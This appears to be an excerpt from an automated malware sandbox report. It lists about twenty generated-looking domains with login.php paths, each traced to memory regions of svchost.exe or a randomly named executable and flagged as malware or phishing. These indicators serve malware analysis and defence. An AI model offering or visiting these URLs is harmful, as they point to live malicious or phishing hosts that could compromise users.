                                                                                                                                                                                                          http://puzylyp.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F20000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qegyvuq.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2074336490.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2076390642.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079858298.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958588808.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080554579.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952973013.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2079969618.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1917692103.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080157740.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galyvuz.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qeqyxov.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565700959.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qexyryl.com/svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowyrif.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowydef.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekyvup.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qexynyq.com/login.phpsvchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lysyvax.com/login.phpsvchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gaqycos.com/svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyryman.com/login.phpsvchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vocyruk.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qexyfuq.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyvymej.com/login.phpsvchost.exe, 00000002.00000003.1644432968.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649417555.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lyryled.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://galydyw.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://lygysij.com/login.phpsvchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600938466.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://qekyhil.com/login.phpsvchost.exe, 00000002.00000003.1580949078.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529894958.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522799533.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523047379.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vofydac.com/login.phpsvchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667325772.000000000CC12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2707783889.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://gacyhez.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1644050118.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880220703.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://vowyrym.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599420800.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          		unknown
